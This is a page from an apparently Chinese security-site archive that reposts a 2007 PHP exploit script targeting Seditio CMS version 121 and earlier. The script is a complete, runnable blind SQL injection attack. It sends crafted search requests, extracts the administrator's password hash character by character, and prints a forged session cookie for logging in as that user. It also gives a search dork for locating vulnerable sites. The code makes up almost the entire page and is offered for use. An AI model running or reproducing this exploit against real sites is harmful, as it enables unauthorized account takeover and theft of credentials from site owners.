首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Seditio CMS <= 121 Remote SQL Injection Exploit
来源:http://inattack.ru 作者:InATeam 发布时间:2007-11-30  
<?php
## Seditio CMS <= 121 Remote SQL Injection Exploit
## Software site: http://www.neocrome.net/
## By InATeam (http://inattack.ru/)
## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off

echo "------------------------------------------------------------\n";
echo "Seditio CMS <= 121 Remote SQL Injection Exploit\n";
echo "(c)oded by Raz0r, InATeam (http://inattack.ru/)\n";
echo "dork: \"Powered by Seditio\"\n";
echo "------------------------------------------------------------\n";

if ($argc<2) {
echo "USAGE:\n";
echo "~~~~~~\n";
echo "php {$argv[0]} [url] OPTIONS\n\n";
echo "[url]        - target server where Seditio CMS is installed\n\n";
echo "OPTIONS:\n";
echo "-p=<prefix>  - use specific prefix (default sed_)\n";
echo "-id=<id>     - use specific user id (default 1)\n\n";
echo "examples:\n";
echo "php {$argv[0]} http://site.com/ -p=cms_\n";
echo "php {$argv[0]} http://cms.site.com:8080/ -id=2\n";
die;
}

error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
$url = $argv[1];
for($i=2;$i<$argc;$i++) {
   if(strpos($argv[$i],"=")!==false) {
       $exploded=explode("=",$argv[$i]);
       if ($exploded[0]=='-p') $prefix = $exploded[1];
       if ($exploded[0]=='-id') $id = $exploded[1];
   }
}
if (!isset($prefix)) $prefix = "sed_";
if (!isset($id)) $id = 1;
$url_parts = parse_url($url);
$host = $url_parts['host'];
if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;
$path = $url_parts['path'];
print("[~] Connecting... ");
if (!getchar("<1",$i,false)) print("OK\n");
else die("\n[-] Exploit failed\n");
print("    Getting hash...");
$hash='';
for ($i=1; $i<=32; $i++) {
   if (!getchar(">57",$i)) {
       $min = 48;
       $max = 57;           }
   else {
       $min = 97;
       $max = 102;           }
   for($j=$min;$j<=$max;$j++) {
       if (getchar("+LIKE+$j",$i)) {
           $hash .= chr($j);
           break;
       }
   }
}
print("[+] Done! hash - $hash\n");
print("[+] Cookie to log in: \nSEDITIO=".base64_encode($id.":_:".$hash.":_:ice")."\n");

function getchar($query,$pos,$status=true){
   global $host,$path,$prefix,$id;
   if ($status) status();
   $data = "sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1";
   $data.= "&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty')";
   $data.= "+AND+1=IF(ORD(MID((SELECT+user_password+FROM+{$prefix}users+WHERE";
   $data.= "+user_id={$id}),{$pos},1)){$query},1,(SELECT+1+UNION+SELECT+5))/*&x=GUEST";
      $packet  = "POST {$path}plug.php?e=search&a=search HTTP/1.1\r\n";
   $packet .= "Host: {$host}\r\n";
   $packet .= "Referer: http://{$host}{$path}plug.php?e=search&a=search\r\n";
   $packet .= "User-Agent: InAttack User Agent\r\n";
   $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
   $packet .= "Content-Length: ".strlen($data)."\r\n";
   $packet .= "Connection: Close\r\n\r\n";
   $packet .= $data;
   return (strpos(send($packet),'Subquery returns more than 1 row')===false) ? true : false;
}

function send($packet) {
   global $host,$port;
   $ock = fsockopen(gethostbyname($host),$port);
   if ($ock) {
       fputs($ock, $packet);
       $html='';
       while (!feof($ock)) $html.=fgets($ock);
   }
   else die("[-] Exploit failed\n");
   return $html;
}

function status() {
   static $n;
   $n++;
   if ($n > 3) $n = 0;
   if($n==0){ print "\r[-]\r"; }
   if($n==1){ print "\r[\\]\r";}
   if($n==2){ print "\r[|]\r"; }
   if($n==3){ print "\r[/]\r"; }
}
?>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·警告!暴风影音3.7.11.13 爆远程
·Windows Media Player AIFF Divi
·DeluxeBB <= 1.09 Remote Admin
·RealPlayer 11 Malformed AU Fil
·VLC 0.86 < 0.86d ActiveX Remot
·Apple Mac OS X xnu <= 1228.0 L
·Apple Mac OS X 10.5.0 (leopard
·Softbiz Freelancers Script v.1
·Cisco Phone 7940 Remote Denial
·RunCMS <= 1.6 disclaimer.php R
·Send ICMP Nasty Garbage (sing)
·Apple QuickTime 7.3 RTSP Respo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved